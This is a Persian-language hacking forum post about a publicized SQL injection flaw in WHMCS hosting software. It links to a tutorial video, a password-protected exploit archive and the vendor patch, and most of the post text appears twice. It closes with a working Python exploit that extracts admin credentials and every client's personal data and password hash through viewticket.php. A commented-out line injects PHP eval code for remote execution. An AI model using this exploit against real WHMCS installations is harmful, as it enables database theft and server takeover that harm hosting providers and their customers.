با سلام خدمت تمامی دوستان عزیز
چند روزی هست که یک باگ SQLi از WHMCS پابلیک شده که کمی امنیت سایت های هاستینگ که از این CMS و این ورژن استفاده میکنند رو به خطر میندازه...
یک فیلم آموزشی از این باگ تهیه شده که میتونید از لینک زیر دانلود کنید :
http://iranhack.com/dl/whmcs_new_bug.part1.rar
http://iranhack.com/dl/whmcs_new_bug.part2.rar
http://iranhack.com/dl/whmcs_new_bug.part3.rar
http://iranhack.com/dl/whmcs_new_bug.part4.rar
http://iranhack.com/dl/whmcs_new_bug.part5.rar
http://iranhack.com/dl/whmcs_new_bug.part6.rar
http://iranhack.com/dl/whmcs_new_bug.part7.rar
لینک دانلود اکسپلویت :
http://iranhack.com/dl/expl.rar
پسورد فایل های فشرده : iranhackforever
ابتدا همه ی پارت ها رو دانلود کرده و سپس در یک مکان از حالت فشرده خارج کنید
و اما برای پچ کردن، این فایل رو میتونید از وبسایت رسمی whmcs دانلود کنید : http://www.whmcs.com/members/dl.php?type=d&id=418
و فایل های موجود در این فایل رو جایگزین فایل های فعلی کنید...
کد اکسپلویت برای عزیزانی که با utf ویندوز و لینوکس مشکل دارند :
موفق باشید
چند روزی هست که یک باگ SQLi از WHMCS پابلیک شده که کمی امنیت سایت های هاستینگ که از این CMS و این ورژن استفاده میکنند رو به خطر میندازه...
یک فیلم آموزشی از این باگ تهیه شده که میتونید از لینک زیر دانلود کنید :
http://iranhack.com/dl/whmcs_new_bug.part1.rar
http://iranhack.com/dl/whmcs_new_bug.part2.rar
http://iranhack.com/dl/whmcs_new_bug.part3.rar
http://iranhack.com/dl/whmcs_new_bug.part4.rar
http://iranhack.com/dl/whmcs_new_bug.part5.rar
http://iranhack.com/dl/whmcs_new_bug.part6.rar
http://iranhack.com/dl/whmcs_new_bug.part7.rar
لینک دانلود اکسپلویت :
http://iranhack.com/dl/expl.rar
پسورد فایل های فشرده : iranhackforever
ابتدا همه ی پارت ها رو دانلود کرده و سپس در یک مکان از حالت فشرده خارج کنید
و اما برای پچ کردن، این فایل رو میتونید از وبسایت رسمی whmcs دانلود کنید : http://www.whmcs.com/members/dl.php?type=d&id=418
و فایل های موجود در این فایل رو جایگزین فایل های فعلی کنید...
کد اکسپلویت برای عزیزانی که با utf ویندوز و لینوکس مشکل دارند :
کد:
#!/usr/bin/env python
url = 'http://target.com'
import urllib, re, sys
from urllib2 import Request, urlopen
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
def exploit(sql):
sqlUnion = '-1 union select 1,0,0,0,0,0,0,0,0,0,0,%s,0,0,0,0,0,0,0,0,0,0,0#' % sql
print "Doing stuff: %s" % sqlUnion
#you could exploit any file that does a select, I randomly chose viewticket.php
r = urlopen(Request('%sviewticket.php' % url, data="tid[sqltype]=TABLEJOIN&tid[value]=%s" % sqlUnion, headers={"User-agent": ua})).read()
return re.search(r'<div class="clientmsg">(.*?)</div>', r, re.DOTALL).group(1).strip()
#get admins
print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)')
#get users
count = int(exploit('(SELECT COUNT(id) FROM tblclients)'))
print "User count %d" % count
for i in range(count):
print exploit('(SELECT CONCAT(id,0x3a,firstname,0x3a,lastname,0x3a,address1,0x3a,address2,0x3a,city,0x3a,country,0x3a,ip,0x3a,email,0x3a,password) FROM tblclients LIMIT %d,1)' % i)
#are you evil? yes, you are!
#php = "1';eval($_REQUEST['lol_whmcs']);#"
#r = urlopen(Request('%sadmin/licenseerror.php?updatekey=true&whitelisted=1&newlicensekey=%s&match=1&username[sqltype]=TABLEJOIN&username[value]=-1||1=1%%23' % (url, urllib.quote_plus(php)), headers={"User-agent": ua})).read()





نظر